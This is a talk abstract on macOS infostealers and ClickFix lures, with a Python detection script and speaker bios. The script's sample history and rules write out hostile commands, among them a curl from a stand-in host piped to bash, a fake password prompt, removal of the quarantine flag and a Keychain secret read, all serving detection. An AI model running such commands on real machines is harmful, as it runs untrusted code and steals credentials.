The Silent Invaders: Understanding and Combating macOS Infostealers

macOS infostealers have rapidly evolved into a major cybersecurity threat, with their prevalence doubling in the past year. These threats, often distributed as malware-as-a-service, increasingly target macOS users across industries and geographies. The latest wave, particularly variants such as Atomic Stealer, demonstrates enhanced stealth, persistence, and backdoor capabilities.

This paper investigates how macOS infostealers leverage emerging initial access vectors, including malvertising, the impersonation of trusted applications such as Slack and Homebrew, and, more recently, ClickFix, a social-engineering technique that tricks the victim into pasting and running a malicious command themselves, further expanding the attackers' reach and deception capabilities. Once inside, the stealers use payload encryption, advanced obfuscation, and token regeneration to maintain access and exfiltrate sensitive data, including credentials, browser artifacts, and crypto wallets.

We will analyze infection chains, shared codebases, MITRE ATT&CK mappings, and the broader impact of these threats. The session will also highlight proactive defense strategies, including dynamic detection, user awareness, and endpoint hardening, to counter this growing menace.
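As a concrete illustration of the "dynamic detection" angle mentioned above, the following is an added example (not code from the talk or its authors) that scans shell-history lines for command patterns commonly associated with ClickFix lures and macOS infostealer activity: a remote script piped straight into a shell, a base64-decoded payload executed via sh, an osascript password dialog with a hidden answer, removal of the com.apple.quarantine attribute, and direct Keychain or wallet-directory access. The rules are generic heuristics assumed for the example, not indicators from the talk, and the sample history is constructed.

```python
"""Heuristic scan of shell-command lines for ClickFix-style and macOS
infostealer behaviour.  Added example, not from the talk; the RULES below
are assumed generic heuristics, not the speakers' indicators."""
import re
from typing import Dict, List

# (rule name, compiled regex).  Constructed heuristics, not published IOCs.
RULES = [
    # "curl ... | bash" / "wget ... | sh": the classic ClickFix one-liner.
    ("remote_script_piped_to_shell",
     re.compile(r"\b(curl|wget)\s+[^|]*\|\s*(ba|z)?sh\b")),
    # Inline payload hidden behind base64 and fed to a shell (macOS base64 uses -D or -d).
    ("base64_decoded_to_shell",
     re.compile(r"base64\s+(-d|--decode|-D)\b[^|]*\|\s*(ba|z)?sh\b")),
    # AppleScript dialog asking for a password ("with hidden answer" masks the input).
    ("osascript_password_prompt",
     re.compile(r"osascript\b.*display dialog.*hidden answer", re.IGNORECASE)),
    # Stripping the quarantine flag so Gatekeeper does not inspect the download.
    ("quarantine_removal",
     re.compile(r"xattr\s+(-r\s+)?-d\s+com\.apple\.quarantine")),
    # Reading Keychain secrets or well-known wallet data directories.
    ("keychain_or_wallet_access",
     re.compile(r"security\s+find-(generic|internet)-password"
                r"|Library/Application Support/(Exodus|Electrum|Atomic)",
                re.IGNORECASE)),
]


def scan_command(cmd: str) -> List[str]:
    """Return the names of every rule that matches a single command line."""
    return [name for name, rx in RULES if rx.search(cmd)]


def scan_history(lines: List[str]) -> List[Dict[str, object]]:
    """Scan an iterable of history lines; return one record per line that
    triggered at least one rule, with its 1-based line number."""
    hits = []
    for number, line in enumerate(lines, start=1):
        matched = scan_command(line)
        if matched:
            hits.append({"line": number, "rules": matched, "command": line.strip()})
    return hits


# Constructed sample history: a mix of benign commands and suspicious ones.
SAMPLE_HISTORY = [
    "ls -la ~/Downloads",
    "curl -fsSL https://example.invalid/fix.sh | bash",
    "echo aGVsbG8= | base64 -D | sh",
    "osascript -e 'display dialog \"macOS needs to update settings\" default answer \"\" with hidden answer'",
    "xattr -d com.apple.quarantine ~/Downloads/Slack.app",
    "security find-generic-password -wa 'Chrome Safe Storage'",
    "git status",
]

if __name__ == "__main__":
    # Replace SAMPLE_HISTORY with open(os.path.expanduser("~/.zsh_history")) for a real scan.
    for hit in scan_history(SAMPLE_HISTORY):
        print(f"line {hit['line']}: {', '.join(hit['rules'])} :: {hit['command']}")
```

The scan is deliberately narrow so that it stays quiet on normal developer activity; in practice it belongs alongside process-creation telemetry (parent osascript or Terminal spawning curl/bash) rather than replacing it, and every rule should be tuned against the baseline of the fleet it is deployed to.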

Srinivasan Govindarajan – Microsoft

Srinivasan Govindarajan is a Senior Security Researcher at Microsoft India, specializing in macOS threat detection and malware analysis. With over 13 years of experience in the cybersecurity domain, he brings deep expertise in reverse engineering, stealthy payload detection, and advanced infostealer campaigns. His work focuses on uncovering sophisticated macOS threats and developing robust detection strategies.

Pranjal Gupta – Microsoft

Pranjal Gupta is a Security Researcher 2 at Microsoft with 9 years of experience in the cybersecurity domain. Pranjal works in the macOS security research team and has expertise in reverse engineering, malware analysis, and security product development.